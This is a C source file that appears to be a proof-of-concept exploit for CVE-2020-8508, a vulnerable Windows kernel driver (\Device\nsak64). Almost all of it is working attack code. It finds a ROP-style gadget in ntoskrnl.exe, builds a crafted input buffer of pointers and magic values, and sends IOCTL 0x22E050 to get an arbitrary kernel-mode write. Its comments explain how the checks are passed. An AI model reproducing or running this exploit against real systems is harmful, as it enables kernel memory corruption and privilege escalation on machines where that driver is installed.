CVE-2020-8508.c

#include <windows.h>
#include <winternl.h>
#include <psapi.h>
#include <stdio.h>

typedef unsigned long long QWORD; // DWORD64

LPVOID GetNtKernelBase() 
{
  LPVOID lpDriver;
  /*
    ntoskrnl.exe is always the first driver, so you don't need to loop through to find it
  */
  K32EnumDeviceDrivers(&lpDriver, sizeof(LPVOID), NULL);
  return(lpDriver);
}

LPVOID FindNtKernelGadget()
{
  MEMORY_BASIC_INFORMATION  memInfo;
  HMODULE                   hKernel;
  LPVOID                    lpPointer;
  BOOL                      bFound;
  BYTE                      bGadget1[] = { 0x8A, 0xC1, 0xC3 };
  /*
    Search ntoskrnel for: 
      mov al, cl
      ret
  */
  hKernel = LoadLibraryExA("ntoskrnl.exe", 0, DONT_RESOLVE_DLL_REFERENCES);
  if (hKernel)
  {
    bFound = FALSE;
    (QWORD)lpPointer = hKernel;
    for (lpPointer = NULL; VirtualQuery(lpPointer, &memInfo, sizeof(memInfo)); (QWORD)lpPointer += memInfo.RegionSize)
    {
      if (memInfo.Protect == PAGE_EXECUTE_READ)
      {
        for (QWORD qwIndex = 0; qwIndex < memInfo.RegionSize; qwIndex++)
        {
          if (!memcmp((QWORD)lpPointer + qwIndex, &bGadget1, sizeof(bGadget1)))
          {
            bFound = TRUE;
            (QWORD)lpPointer += qwIndex;
            break;
          }
        }
      }
      if (bFound)
      {
        break;
      }
    }
    (QWORD)lpPointer -= (QWORD)hKernel;
    FreeLibrary(hKernel);
    (QWORD)lpPointer += (QWORD)GetNtKernelBase();	
    return(lpPointer);
  }
  return(0);
}

int main(int argc, char* argv[]) {
  OBJECT_ATTRIBUTES   objAttr;
  IO_STATUS_BLOCK     ioBlock;
  UNICODE_STRING      usDeviceName;
  NTSTATUS            ntRet;
  HANDLE              hDriver;
  LPVOID              lpIn;
  LPVOID              lpOut;
  QWORD               qwMov;
  DWORD               dwBytesOut;
  QWORD               qwKernelGadget;
  DWORD               dwIoctl;

  qwKernelGadget = FindNtKernelGadget();
  printf("[i] Kernel Gadget: 0x%I64X\n", qwKernelGadget);
  RtlInitUnicodeString(&usDeviceName, L"\\Device\\nsak64"); // SOMETIMES nsak64 or norman
  InitializeObjectAttributes(&objAttr, &usDeviceName, 0, 0, 0);
  lpIn = VirtualAlloc(0x45000000, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
  lpOut = VirtualAlloc(0x42000000, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
  ntRet = NtCreateFile(&hDriver, FILE_READ_ACCESS | FILE_WRITE_ACCESS, &objAttr, &ioBlock, 0, 0, 0, OPEN_EXISTING, 0, 0, 0);

  if (hDriver != INVALID_HANDLE_VALUE) 
  {
    printf("[i] Opened driver with handle: 0x%X\n", hDriver);
    /*
      There are many vulnerable IOCTLs, but 0x22E050 is probably the easiest to exploit
    */
    dwIoctl = 0x22E050;
    /*
      These "random" values are required to pass certain compare operations. 
      Some values are derefenced so a pointers to a valid memory location is required.
      It's worth noting this all happens in a try-catch block, so exceptions won't cause a BSoD.
    */
    qwMov = 0x61792283;
    memmove(lpIn, &qwMov, sizeof(DWORD));
    qwMov = 0x88;
    memmove((BYTE*)lpIn + 0x4, &qwMov, sizeof(DWORD));
    qwMov = 0x45000030; // Pointer
    memmove((BYTE*)lpIn + 0x10, &qwMov, sizeof(QWORD));
    qwMov = 0x45000040; // Pointer
    memmove((BYTE*)lpIn + 0x30, &qwMov, sizeof(QWORD));
    qwMov = 0x45000080; //Pointer
    memmove((BYTE*)lpIn + 0x40, &qwMov, sizeof(QWORD));
    qwMov = 0x45000050; // Pointer
    memmove((BYTE*)lpIn + 0xDC, &qwMov, sizeof(QWORD));
    qwMov = 0x4C53D3;
    memmove((BYTE*)lpIn + 0x50, &qwMov, sizeof(QWORD));
    qwMov = 0x108;
    memmove((BYTE*)lpIn + 0x54, &qwMov, sizeof(QWORD));

    qwMov = qwKernelGadget; // First call (mov al, cl; then ret)
    memmove((BYTE*)lpIn + 0xF8, &qwMov, sizeof(QWORD));
    qwMov = ((BYTE*)qwKernelGadget + 0x2); // Second call (simply a ret)
    memmove((BYTE*)lpIn + 0xA8, &qwMov, sizeof(QWORD));
    qwMov = 0xEEEEEEEEEEEEEEEE; // The WHERE (pointer to any kerenl mode address)
    memmove((BYTE*)lpIn + 0x8, &qwMov, sizeof(QWORD));
    qwMov = 0xDD; // Only 1 fully controllable byte will get written (but as a DWORD)
    memmove((BYTE*)lpIn + 0x80, &qwMov, sizeof(QWORD));

    DeviceIoControl(hDriver, dwIoctl, lpIn, 0x1000, lpOut, 0x1000, &dwBytesOut, NULL);
    printf("[.] Press enter to exit...\n");
    getchar();
    ExitProcess(0);
  }
  printf("[!!!] Unable to open driver\n");
  ExitProcess(-1);
  return(0);
}